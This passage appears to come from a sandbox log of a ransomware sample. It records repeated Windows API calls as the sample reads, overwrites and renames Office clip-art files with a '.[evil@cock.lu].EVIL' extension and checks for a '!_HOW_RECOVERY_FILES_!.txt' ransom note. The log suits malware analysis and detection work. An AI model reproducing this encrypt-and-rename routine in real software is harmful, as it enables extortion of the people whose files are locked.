Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf.[evil@cock.lu].evil")) returned 1 [0149.927] ??_V@YAXPEAX@Z () returned 0x1 [0149.931] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF", dwFileAttributes=0x200) returned 0 [0149.931] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.931] wcsstr (_Str="J0185834.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.931] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 69 [0149.931] wcscmp (_String1="J0185834.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.931] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185834.WMF") returned 0x0 [0149.931] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 0x45 [0149.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.933] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2182, lpOverlapped=0x0) returned 1 [0149.937] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.937] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.937] _errno () returned 0x84b1160840 [0149.937] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.937] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x21a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x21a0, lpOverlapped=0x0) returned 1 [0149.937] CloseHandle (hObject=0x1a8) returned 1 [0149.937] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.938] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.938] __uncaught_exception () returned 0x84b1160800 [0149.938] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.938] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf.[evil@cock.lu].evil")) returned 1 [0149.939] ??_V@YAXPEAX@Z () returned 0x1 [0149.942] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF", dwFileAttributes=0x200) returned 0 [0149.943] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.943] wcsstr (_Str="J0185842.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.943] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 69 [0149.943] wcscmp (_String1="J0185842.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.943] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185842.WMF") returned 0x0 [0149.943] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF") returned 0x45 [0149.943] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.945] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x37e4, lpOverlapped=0x0) returned 1 [0149.948] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.948] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.948] _errno () returned 0x84b1160840 [0149.948] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.948] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3800, lpOverlapped=0x0) returned 1 [0149.949] CloseHandle (hObject=0x1a8) returned 1 [0149.949] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.949] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.949] __uncaught_exception () returned 0x84b1160800 [0149.949] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.950] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf.[evil@cock.lu].evil")) returned 1 [0149.951] ??_V@YAXPEAX@Z () returned 0x1 [0149.954] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF", dwFileAttributes=0x200) returned 0 [0149.954] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.954] wcsstr (_Str="J0186346.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.954] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 69 [0149.954] wcscmp (_String1="J0186346.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.954] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0186346.WMF") returned 0x0 [0149.954] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF") returned 0x45 [0149.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.957] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x21da, lpOverlapped=0x0) returned 1 [0149.960] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.960] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.960] _errno () returned 0x84b1160840 [0149.960] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.960] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x21e0, lpOverlapped=0x0) returned 1 [0149.960] CloseHandle (hObject=0x1a8) returned 1 [0149.960] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.960] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.961] __uncaught_exception () returned 0x84b1160800 [0149.961] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.961] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf.[evil@cock.lu].evil")) returned 1 [0149.962] ??_V@YAXPEAX@Z () returned 0x1 [0149.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF", dwFileAttributes=0x200) returned 0 [0149.967] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.967] wcsstr (_Str="J0186360.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.967] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 69 [0149.967] wcscmp (_String1="J0186360.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.967] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0186360.WMF") returned 0x0 [0149.967] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF") returned 0x45 [0149.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.969] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x843a, lpOverlapped=0x0) returned 1 [0149.973] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.973] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.973] _errno () returned 0x84b1160840 [0149.973] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.973] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x8440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8440, lpOverlapped=0x0) returned 1 [0149.973] CloseHandle (hObject=0x1a8) returned 1 [0149.974] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.974] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.974] __uncaught_exception () returned 0x84b1160800 [0149.974] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.974] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf.[evil@cock.lu].evil")) returned 1 [0149.975] ??_V@YAXPEAX@Z () returned 0x1 [0149.977] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF", dwFileAttributes=0x200) returned 0 [0149.978] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.978] wcsstr (_Str="J0186362.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.978] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 69 [0149.978] wcscmp (_String1="J0186362.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.978] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0186362.WMF") returned 0x0 [0149.978] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF") returned 0x45 [0149.978] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.980] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x44fe, lpOverlapped=0x0) returned 1 [0149.991] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.991] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.991] _errno () returned 0x84b1160840 [0149.991] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.992] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4500, lpOverlapped=0x0) returned 1 [0149.992] CloseHandle (hObject=0x1a8) returned 1 [0149.992] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.992] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.992] __uncaught_exception () returned 0x84b1160800 [0149.992] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.992] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf.[evil@cock.lu].evil")) returned 1 [0149.993] ??_V@YAXPEAX@Z () returned 0x1 [0149.996] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF", dwFileAttributes=0x200) returned 0 [0149.996] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.996] wcsstr (_Str="J0186364.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.996] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 69 [0149.996] wcscmp (_String1="J0186364.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.996] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0186364.WMF") returned 0x0 [0149.996] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF") returned 0x45 [0149.996] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.998] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4724, lpOverlapped=0x0) returned 1 [0150.025] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.025] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.025] _errno () returned 0x84b1160840 [0150.025] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.025] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4740, lpOverlapped=0x0) returned 1 [0150.026] CloseHandle (hObject=0x1a8) returned 1 [0150.026] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.026] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.026] __uncaught_exception () returned 0x84b1160800 [0150.026] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.026] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf.[evil@cock.lu].evil")) returned 1 [0150.028] ??_V@YAXPEAX@Z () returned 0x1 [0150.031] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF", dwFileAttributes=0x200) returned 0 [0150.031] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.031] wcsstr (_Str="J0187647.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.031] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 69 [0150.031] wcscmp (_String1="J0187647.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.031] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187647.WMF") returned 0x0 [0150.031] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF") returned 0x45 [0150.031] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.033] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19c4, lpOverlapped=0x0) returned 1 [0150.041] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.041] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.041] _errno () returned 0x84b1160840 [0150.041] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.041] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x19e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19e0, lpOverlapped=0x0) returned 1 [0150.042] CloseHandle (hObject=0x1a8) returned 1 [0150.042] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.042] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.042] __uncaught_exception () returned 0x84b1160800 [0150.042] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.042] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf.[evil@cock.lu].evil")) returned 1 [0150.043] ??_V@YAXPEAX@Z () returned 0x1 [0150.046] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF", dwFileAttributes=0x200) returned 0 [0150.047] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.047] wcsstr (_Str="J0187815.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.047] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 69 [0150.047] wcscmp (_String1="J0187815.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.047] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187815.WMF") returned 0x0 [0150.047] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF") returned 0x45 [0150.047] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.049] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1500, lpOverlapped=0x0) returned 1 [0150.051] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.051] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.051] _errno () returned 0x84b1160840 [0150.051] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.052] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1520, lpOverlapped=0x0) returned 1 [0150.052] CloseHandle (hObject=0x1a8) returned 1 [0150.052] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.052] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.052] __uncaught_exception () returned 0x84b1160800 [0150.052] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.052] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf.[evil@cock.lu].evil")) returned 1 [0150.054] ??_V@YAXPEAX@Z () returned 0x1 [0150.057] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF", dwFileAttributes=0x200) returned 0 [0150.057] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.057] wcsstr (_Str="J0187817.WMF", 